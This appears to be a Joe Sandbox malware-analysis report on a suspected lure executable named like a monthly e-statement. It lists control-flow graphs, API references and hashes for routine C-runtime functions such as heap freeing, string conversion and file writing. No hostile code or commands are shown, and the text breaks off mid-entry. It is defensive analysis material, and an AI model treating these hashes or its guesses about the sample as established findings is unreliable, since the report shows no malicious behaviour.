                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 09cdd8611a9692a34558d8db5ed150207054a68cffb0f8f1215e5e33cbeaed18
                                                                                                                                                                                                                                                                    • Instruction ID: 19c87d9370369d3e2d5275302f1b3f8345d727f9c92e86bd949324e075e01cdd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09cdd8611a9692a34558d8db5ed150207054a68cffb0f8f1215e5e33cbeaed18
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE316D71A003209FEB25AB7AFC46B9677E8EF40720F144429F049D7191DE78FC80AB50

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 138 f24330-f24341 139 f24343-f2434c call f24869 138->139 140 f2434d-f243d8 call f24869 * 9 call f241f6 call f24246 138->140 139->140
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24344
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24350
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2435B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24366
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24371
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2437C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24387
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24392
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2439D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F243AB
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: fc87644b51a8e15e58e1ec25bbfe452e1a05256094174e19f5e83f6d37d16546
                                                                                                                                                                                                                                                                    • Instruction ID: 6c1aaf7bc5f544022396c75b73b973f0d3a73345907355d188d6f5eb40bab2f1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc87644b51a8e15e58e1ec25bbfe452e1a05256094174e19f5e83f6d37d16546
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11B976610158FFCB45EF96EC42CD93B65EF44750F0140A2F9088F162DA75EE50AB80

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 165 f27ab4-f27acd 166 f27ae3-f27ae8 165->166 167 f27acf-f27adf call f282cc 165->167 169 f27af5-f27b19 MultiByteToWideChar 166->169 170 f27aea-f27af2 166->170 167->166 177 f27ae1 167->177 171 f27b1f-f27b2b 169->171 172 f27cac-f27cbf call f2123a 169->172 170->169 174 f27b7f 171->174 175 f27b2d-f27b3e 171->175 181 f27b81-f27b83 174->181 178 f27b40-f27b4f call f2ac20 175->178 179 f27b5d-f27b63 175->179 177->166 184 f27ca1 178->184 191 f27b55-f27b5b 178->191 183 f27b64 call f262ff 179->183 181->184 185 f27b89-f27b9c MultiByteToWideChar 181->185 187 f27b69-f27b6e 183->187 189 f27ca3-f27caa call f2646a 184->189 185->184 188 f27ba2-f27bbd call f25a15 185->188 187->184 192 f27b74 187->192 188->184 197 f27bc3-f27bca 188->197 189->172 196 f27b7a-f27b7d 191->196 192->196 196->181 198 f27c04-f27c10 197->198 199 f27bcc-f27bd1 197->199 201 f27c12-f27c23 198->201 202 f27c5c 198->202 199->189 200 f27bd7-f27bd9 199->200 200->184 203 f27bdf-f27bf9 call f25a15 200->203 205 f27c25-f27c34 call f2ac20 201->205 206 f27c3e-f27c44 201->206 204 f27c5e-f27c60 202->204 203->189 218 f27bff 203->218 208 f27c62-f27c7b call f25a15 204->208 209 f27c9a-f27ca0 call f2646a 204->209 205->209 221 f27c36-f27c3c 205->221 211 f27c45 call f262ff 206->211 208->209 223 f27c7d-f27c84 208->223 209->184 212 f27c4a-f27c4f 211->212 212->209 217 f27c51 212->217 222 f27c57-f27c5a 217->222 218->184 221->222 222->204 224 f27cc0-f27cc6 223->224 225 f27c86-f27c87 223->225 226 f27c88-f27c98 WideCharToMultiByte 224->226 225->226 226->209 227 f27cc8-f27ccf call f2646a 226->227 227->189
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00F254C8,00000000,?,?,?,00F27D05,?,?,00000100), ref: 00F27B0E
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F27B46
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00F27D05,?,?,00000100,5EFC4D8B,?,?), ref: 00F27B94
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F27C2B
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F27C8E
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F27C9B
                                                                                                                                                                                                                                                                      • Part of subcall function 00F262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F27E5B,?,00000000,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD), ref: 00F26331
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F27CA4
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F27CC9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2597970681-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8ea96bda528cb1f3e13b438d3ddf15105345de4164d3c9d72e4764621044c00c
                                                                                                                                                                                                                                                                    • Instruction ID: 2c0ed481370dfd29da89a180ba65adb10afe16a44483625eafac6c3c6e9fd481
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea96bda528cb1f3e13b438d3ddf15105345de4164d3c9d72e4764621044c00c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51D272A54326ABDB25AF74EC81EBF77AAEB44760B154629FC04DA140EB38DC40E650

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 230 f28417-f28474 GetConsoleCP 231 f285b7-f285c9 call f2123a 230->231 232 f2847a-f28496 230->232 233 f284b1-f284c2 call f26052 232->233 234 f28498-f284af 232->234 242 f284c4-f284c7 233->242 243 f284e8-f284ea 233->243 236 f284eb-f284fa call f272b7 234->236 236->231 244 f28500-f28520 WideCharToMultiByte 236->244 245 f2858e-f285ad 242->245 246 f284cd-f284df call f272b7 242->246 243->236 244->231 247 f28526-f2853c WriteFile 244->247 245->231 246->231 253 f284e5-f284e6 246->253 249 f2853e-f2854f 247->249 250 f285af-f285b5 GetLastError 247->250 249->231 252 f28551-f28555 249->252 250->231 254 f28583-f28586 252->254 255 f28557-f28575 WriteFile 252->255 253->244 254->232 257 f2858c 254->257 255->250 256 f28577-f2857b 255->256 256->231 258 f2857d-f28580 256->258 257->231 258->254
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F28B8C,?,00000000,?,00000000,00000000), ref: 00F28459
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00F284D4
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00F284EF
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F28515
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00F28B8C,00000000,?,?,?,?,?,?,?,?,?,00F28B8C,?), ref: 00F28534
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F28B8C,00000000,?,?,?,?,?,?,?,?,?,00F28B8C,?), ref: 00F2856D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                    • Opcode ID: 24bf72b642adb5f6a343a4d24007998a97c07038302d6a799520ae12fb3418cc
                                                                                                                                                                                                                                                                    • Instruction ID: fb5cf23054b0f75aa31262fc0c38e38fb8be5993161fbf33b3422389067a38cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24bf72b642adb5f6a343a4d24007998a97c07038302d6a799520ae12fb3418cc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E51D471D002599FDB10CFA8EC95AEEBBF5FF18360F18411AE951E7291D7309942DB60

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 259 f21e00-f21e51 call f2ac80 call f21dc0 call f22377 266 f21e53-f21e65 259->266 267 f21ead-f21eb0 259->267 269 f21ed0-f21ed9 266->269 270 f21e67-f21e7e 266->270 268 f21eb2-f21ebf call f22360 267->268 267->269 274 f21ec4-f21ecd call f21dc0 268->274 272 f21e80-f21e8e call f22300 270->272 273 f21e94 270->273 281 f21e90 272->281 282 f21ea4-f21eab 272->282 276 f21e97-f21e9c 273->276 274->269 276->270 279 f21e9e-f21ea0 276->279 279->269 283 f21ea2 279->283 284 f21e92 281->284 285 f21eda-f21ee3 281->285 282->274 283->274 284->276 286 f21ee5-f21eec 285->286 287 f21f1d-f21f2d call f22340 285->287 286->287 289 f21eee-f21efd call f2aac0 286->289 292 f21f41-f21f5d call f21dc0 call f22320 287->292 293 f21f2f-f21f3e call f22360 287->293 297 f21f1a 289->297 298 f21eff-f21f17 289->298 293->292 297->287 298->297
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F21E37
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F21E3F
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F21EC8
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F21EF3
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F21F48
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 4b824dfff8c5bc6569224c1d6a7924daf87c682f55bc9f451d3f876eda8a036e
                                                                                                                                                                                                                                                                    • Instruction ID: 2a3c1bf4265d7d0be8945c233505223d7d7f5e399f26edb6bd93e3b17ed22b43
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b824dfff8c5bc6569224c1d6a7924daf87c682f55bc9f451d3f876eda8a036e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC411334E00228ABCF10DF68EC81AAEBBB5BF54364F148055EC149B392C735EE11EB95

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 305 f2621b-f26226 306 f262fc-f262fe 305->306 307 f2622c-f262f9 call f261df * 5 call f24869 * 3 call f261df * 5 call f24869 * 4 305->307 307->306
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00F261DF: _free.LIBCMT ref: 00F26208
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26269
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26274
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2627F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F262D3
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F262DE
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F262E9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F262F4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                                    • Instruction ID: b848f759413a7db1b3f21b6d00aca49ddd28297dc823111d0adc10f35a6da5d6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43112171540B74AAD560B7B1EC07FCB779C9F44B00F404825B69AE6093DA69BA146650

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 342 f223d1-f223d8 343 f223da-f223dc 342->343 344 f223dd-f223f8 GetLastError call f226a4 342->344 347 f22411-f22413 344->347 348 f223fa-f223fc 344->348 349 f22457-f22462 SetLastError 347->349 348->349 350 f223fe-f2240f call f226df 348->350 350->347 353 f22415-f22425 call f23f67 350->353 356 f22427-f22437 call f226df 353->356 357 f22439-f22449 call f226df 353->357 356->357 362 f2244b-f2244d 356->362 363 f2244f-f22456 call f23ec5 357->363 362->363 363->349
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00F223C8,00F2209F,00F21AFC), ref: 00F223DF
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F223ED
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F22406
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00F223C8,00F2209F,00F21AFC), ref: 00F22458
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 24df13095c697d8793061c126919698acc9ae843e1dfdf37c458baade86d22be
                                                                                                                                                                                                                                                                    • Instruction ID: f724b511e2fbb13b64c69858631d2765515de0f64fb5b3ed791a92835420591c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24df13095c697d8793061c126919698acc9ae843e1dfdf37c458baade86d22be
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B201F7735093397FA6A87BB87C85A673B55EB117B47200339F920850F6EF154C81B240

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 366 f24424-f24438 GetLastError 367 f24446-f2444b 366->367 368 f2443a-f24444 call f25904 366->368 370 f2444d call f2480c 367->370 368->367 373 f2448f-f2449a SetLastError 368->373 372 f24452-f24458 370->372 374 f24463-f24471 call f2595a 372->374 375 f2445a 372->375 380 f24473-f24474 374->380 381 f24476-f2448d call f24296 call f24869 374->381 376 f2445b-f24461 call f24869 375->376 384 f2449b-f244a7 SetLastError call f23f24 376->384 380->376 381->373 381->384
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000008,?,00F26D69,?,?,?,00F304C8,0000002C,00F23F34,00000016,00F2209F,00F21AFC), ref: 00F24428
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2445B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24483
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00F24490
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00F2449C
                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00F244A2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                    • Opcode ID: 69f98e29d558210fa90e51266ae4b8d157e010fc93f42db7e3563f41a919b210
                                                                                                                                                                                                                                                                    • Instruction ID: bd4fbb1405f0d87ce7cdd7ca817d1378981b8aaf9de420499b943c1f1ca919b0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f98e29d558210fa90e51266ae4b8d157e010fc93f42db7e3563f41a919b210
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F0C8329006B4A7C626F7357C09F6B376AABC1B71B244114FD28D21D5EFE899027121

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 390 f236fc-f23724 GetModuleHandleExW 391 f23726-f23739 GetProcAddress 390->391 392 f23749-f2374d 390->392 395 f2373b-f23746 391->395 396 f23748 391->396 393 f23758-f23765 call f2123a 392->393 394 f2374f-f23752 FreeLibrary 392->394 394->393 395->396 396->392
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F236AD,?,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002), ref: 00F2371C
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F2372F
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00F236AD,?,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002,00000000), ref: 00F23752
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                    • Opcode ID: 716020e35fb9425864d239503536bfacca98aeca0eccfe42cb8c74d404cc808c
                                                                                                                                                                                                                                                                    • Instruction ID: dd7d72b07e45a7d2fca3f1939b7cda9c6b45464de848f7666877e5e1f2cf1755
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 716020e35fb9425864d239503536bfacca98aeca0eccfe42cb8c74d404cc808c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38F04FB1A0022CBBCB259B90EC49BAEBFB4EF08752F444064FD05A6150DB349A45EB90

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 400 f2634d-f26372 call f23f72 403 f26374-f2637c 400->403 404 f2637f-f263a5 MultiByteToWideChar 400->404 403->404 405 f26444-f26448 404->405 406 f263ab-f263b7 404->406 409 f26454-f26469 call f2123a 405->409 410 f2644a-f2644d 405->410 407 f26403 406->407 408 f263b9-f263ca 406->408 411 f26405-f26407 407->411 412 f263e5-f263eb 408->412 413 f263cc-f263db call f2ac20 408->413 410->409 416 f26409-f2642b call f220b0 MultiByteToWideChar 411->416 417 f2643d-f26443 call f2646a 411->417 419 f263ec call f262ff 412->419 413->417 427 f263dd-f263e3 413->427 416->417 429 f2642d-f2643b GetStringTypeW 416->429 417->405 420 f263f1-f263f6 419->420 420->417 424 f263f8 420->424 428 f263fe-f26401 424->428 427->428 428->411 429->417
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00F254C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00F2639A
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F263D2
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F26423
